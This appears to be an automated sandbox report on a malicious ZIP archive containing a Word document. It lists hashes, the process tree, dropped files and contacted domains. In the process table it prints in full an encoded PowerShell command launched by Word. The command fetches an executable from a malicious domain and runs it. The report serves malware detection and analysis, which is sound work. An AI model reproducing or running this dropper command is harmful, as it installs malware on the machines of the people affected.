File name: | Casasantachiara.zip |
Full analysis: | https://app.any.run/tasks/782fe032-b7fa-4071-8dd8-a8e4981655d3 |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 08:17:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | CD92571CA4C4C664152FF74112FE77E5 |
SHA1: | 12DA6C89B461C738BCAE442350ABAEAAFB23880A |
SHA256: | 4213DC430165E06BD8458CAA1601B684680BA3335012CF7A86034B309612C2B6 |
SSDEEP: | 768:10rD6P5E+UPzqDOArZ3IML6s2d1FIZ86vPg23yAM52z8gQ8+iRbuFxnxT3cuPyN4:arD6YrqD9rXL6s2d1F80AM52wiuFxnx7 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:06:18 06:02:07 |
ZipCRC: | 0x6b071cb8 |
ZipCompressedSize: | 48819 |
ZipUncompressedSize: | 77312 |
ZipFileName: | info_18.06.doc |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1740 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Casasantachiara.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3708 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb1740.34583\info_18.06.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1364 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Exec Bypass -enc JABpAFYAbwA4ADcAQgB1ACAAPQAgACcATAB2AEgATABLAHIAJwA7ACQARwBjAE8AVQBUAGEARgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAaQBWAG8AOAA3AEIAdQArACcALgBlAHgAZQAnADsAJABvADQAZgA5AFUAZAA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAGAAVABgAC4AdwBlAGIAYABDAEwAaQBlAE4AVAA7ACQAdgB1AFIARABPAEEAegBDAD0AJwBoAHQAdABwADoALwAvAG0ANgAxADQANwBrAGUAZQBnAGEAbgBwAHcALgBpAG4AZgBvAC8AcwBwADIAOAAyAHkALwBzAGkAMgBzADgAMQAtADEAOQAuAHAAaABwAD8AbAA9AHIAdwBvAHEAMQAuAGQAYQB0ACcALgBzAHAAbABpAHQAKAAnACUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQASQBQAHAAbQA0AE4AaQBXACAAaQBuACAAJAB2AHUAUgBEAE8AQQB6AEMAKQB7AHQAcgB5AHsAJABvADQAZgA5AFUAZAAuAEQAbwB3AE4AbABvAGEARABmAEkAbABFACgAJABJAFAAcABtADQATgBpAFcALAAgACQARwBjAE8AVQBUAGEARgApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEcAYwBPAFUAVABhAEYAKQAuAGwARQBOAEcAdABoACAALQBnAGUAIAB7AG4AdQBtAGIAZQByADEAfQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwBUAGEAUgB0ACgAJABHAGMATwBVAFQAYQBGACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9AA0ACgA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC35E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LLB72WMIJOTHHXCKM7JF.temp | — | |
MD5:— | SHA256:— | |||
1740 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb1740.34583\info_18.06.doc | document | |
MD5:F5B5F4B4799C3B6E3EA1E48DBC55209A | SHA256:75D08136A8E3034288185D0A453773F43019D7FF792435AF42147280FD632AA8 | |||
1364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF14d04e.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:209705D762BD9B55D1D0E296E772B2E9 | SHA256:E8A0E5E39B555E7FC04F6ACFCDB7438145D3E3FADC0453ED658BA79DBAF322C4 | |||
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb1740.34583\~$fo_18.06.doc | pgc | |
MD5:184EF813E87C3DB89D4A1A59BFCECCDC | SHA256:2D0C29CA9AC1C72D529E9DEB09E765618890F4D2555C1E8350CD795FAB6B86AA | |||
1364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:72137955DCA8C75389D71BDA66027B75 | SHA256:9FDCF443E2095FA1555C259FD1A9FB564823FF6825642855AC7AC4391CE16A3D |
Domain | IP | Reputation |
---|---|---|
m6147keeganpw.info |
| malicious |
dns.msftncsi.com |
| shared |